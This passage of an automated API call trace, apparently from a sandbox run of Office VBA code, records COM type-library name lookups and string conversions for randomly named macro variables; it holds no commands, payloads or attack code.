ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.136] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.136] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a626da | out: _Dst=0x67c2d40) returned 0x0 [0069.137] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HADBXB") returned 0x10c99b [0069.137] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HADBXB" | out: _Dst="_B_var_HADBXB") returned 0x0 [0069.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HADBXB") returned 14 [0069.137] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.137] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HADBXB", lHashVal=0x10c99b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.137] IUnknown:Release (This=0x665ba50) returned 0xd [0069.137] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.137] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HADBXB", lHashVal=0x10c99b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.137] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.137] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.137] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HADBXB", lHashVal=0x10c99b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.137] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.137] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.137] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HADBXB", lHashVal=0x10c99b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.137] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.137] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.137] IUnknown:Release (This=0x665ba50) returned 0xd [0069.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1142e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HADBXB") returned 14 [0069.137] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HADBXB", lHashVal=0x10c99b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004200000000, pDummy=0x0) returned 0x0 [0069.137] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a626da | out: _Dst=0x144ec0) returned 0x0 [0069.137] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EAoUUBU", lHashVal=0x105a13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62702, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAoUUBU") returned 8 [0069.137] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EAoUUBU", lHashVal=0x105a13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62702, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAoUUBU") returned 8 [0069.138] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EAoUUBU", lHashVal=0x105a13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.138] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAoUUBU") returned 0x105a13 [0069.138] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="EAoUUBU" | out: _Dst="EAoUUBU") returned 0x0 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="EAoUUBU") returned 8 [0069.138] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.138] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EAoUUBU", lHashVal=0x105a13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.138] IUnknown:Release (This=0x665ba50) returned 0xd [0069.138] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.138] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EAoUUBU", lHashVal=0x105a13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.138] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.138] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.138] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EAoUUBU", lHashVal=0x105a13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.138] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.138] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.138] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EAoUUBU", lHashVal=0x105a13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.138] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62702, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAoUUBU") returned 8 [0069.138] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EAoUUBU", lHashVal=0x105a13, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.138] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.138] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62702 | out: _Dst=0x67c2d40) returned 0x0 [0069.138] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EAoUUBU") returned 0x105d97 [0069.138] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_EAoUUBU" | out: _Dst="_B_var_EAoUUBU") returned 0x0 [0069.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_EAoUUBU") returned 15 [0069.138] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.138] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EAoUUBU", lHashVal=0x105d97, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.138] IUnknown:Release (This=0x665ba50) returned 0xd [0069.139] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.139] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EAoUUBU", lHashVal=0x105d97, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.139] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.139] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.139] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EAoUUBU", lHashVal=0x105d97, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.139] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.139] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.139] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EAoUUBU", lHashVal=0x105d97, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.139] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.139] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.139] IUnknown:Release (This=0x665ba50) returned 0xd [0069.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1145e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_EAoUUBU") returned 15 [0069.139] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EAoUUBU", lHashVal=0x105d97, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0) returned 0x0 [0069.139] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62702 | out: _Dst=0x144ec0) returned 0x0 [0069.139] ITypeComp:RemoteBind (in: This=0x665ba60, szName="CZAwAA", lHashVal=0x1033be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6272a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="CZAwAA") returned 7 [0069.139] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="CZAwAA", lHashVal=0x1033be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6272a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="CZAwAA") returned 7 [0069.139] ITypeComp:RemoteBind (in: This=0x665bd30, szName="CZAwAA", lHashVal=0x1033be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.139] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CZAwAA") returned 0x1033be [0069.139] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="CZAwAA" | out: _Dst="CZAwAA") returned 0x0 [0069.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="CZAwAA") returned 7 [0069.140] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.140] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="CZAwAA", lHashVal=0x1033be, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.140] IUnknown:Release (This=0x665ba50) returned 0xd [0069.140] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.140] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="CZAwAA", lHashVal=0x1033be, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.140] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.140] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.140] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="CZAwAA", lHashVal=0x1033be, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.140] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.140] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.140] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="CZAwAA", lHashVal=0x1033be, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.140] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6272a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="CZAwAA") returned 7 [0069.140] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="CZAwAA", lHashVal=0x1033be, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.140] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.140] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6272a | out: _Dst=0x67c2d40) returned 0x0 [0069.140] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CZAwAA") returned 0x10ae67 [0069.140] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_CZAwAA" | out: _Dst="_B_var_CZAwAA") returned 0x0 [0069.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_CZAwAA") returned 14 [0069.140] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.140] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_CZAwAA", lHashVal=0x10ae67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.140] IUnknown:Release (This=0x665ba50) returned 0xd [0069.140] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.140] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_CZAwAA", lHashVal=0x10ae67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.140] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.140] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.140] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_CZAwAA", lHashVal=0x10ae67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.140] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.141] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.141] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_CZAwAA", lHashVal=0x10ae67, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.141] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.141] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.141] IUnknown:Release (This=0x665ba50) returned 0xd [0069.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1148e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_CZAwAA") returned 14 [0069.141] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_CZAwAA", lHashVal=0x10ae67, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x43005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x43005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0) returned 0x0 [0069.141] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6272a | out: _Dst=0x144ec0) returned 0x0 [0069.141] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bGoCox", lHashVal=0x10b4e8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62752, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bGoCox") returned 7 [0069.141] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bGoCox", lHashVal=0x10b4e8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62752, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bGoCox") returned 7 [0069.141] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bGoCox", lHashVal=0x10b4e8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.141] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bGoCox") returned 0x10b4e8 [0069.141] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="bGoCox" | out: _Dst="bGoCox") returned 0x0 [0069.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="bGoCox") returned 7 [0069.142] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.142] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bGoCox", lHashVal=0x10b4e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.142] IUnknown:Release (This=0x665ba50) returned 0xd [0069.142] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.142] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bGoCox", lHashVal=0x10b4e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.142] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.142] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.142] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bGoCox", lHashVal=0x10b4e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.142] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.142] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.142] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bGoCox", lHashVal=0x10b4e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.142] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62752, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bGoCox") returned 7 [0069.142] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bGoCox", lHashVal=0x10b4e8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.142] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.143] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62752 | out: _Dst=0x67c2d40) returned 0x0 [0069.143] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bGoCox") returned 0x102f52 [0069.143] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_bGoCox" | out: _Dst="_B_var_bGoCox") returned 0x0 [0069.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_bGoCox") returned 14 [0069.143] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.143] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bGoCox", lHashVal=0x102f52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.143] IUnknown:Release (This=0x665ba50) returned 0xd [0069.143] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.143] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bGoCox", lHashVal=0x102f52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.143] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.143] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.143] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bGoCox", lHashVal=0x102f52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.143] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.143] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.143] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bGoCox", lHashVal=0x102f52, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.143] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.143] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.143] IUnknown:Release (This=0x665ba50) returned 0xd [0069.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b114be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_bGoCox") returned 14 [0069.143] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bGoCox", lHashVal=0x102f52, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x6f004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x6f004300000000, pDummy=0x0) returned 0x0 [0069.143] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62752 | out: _Dst=0x144ec0) returned 0x0 [0069.143] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.143] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.143] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.144] IUnknown:Release (This=0x665ba50) returned 0xd [0069.144] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.144] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.144] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.144] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.144] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.144] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.144] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.144] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.144] IUnknown:Release (This=0x665ba50) returned 0xd [0069.144] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.144] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.144] ITypeInfo:RemoteGetDllEntry 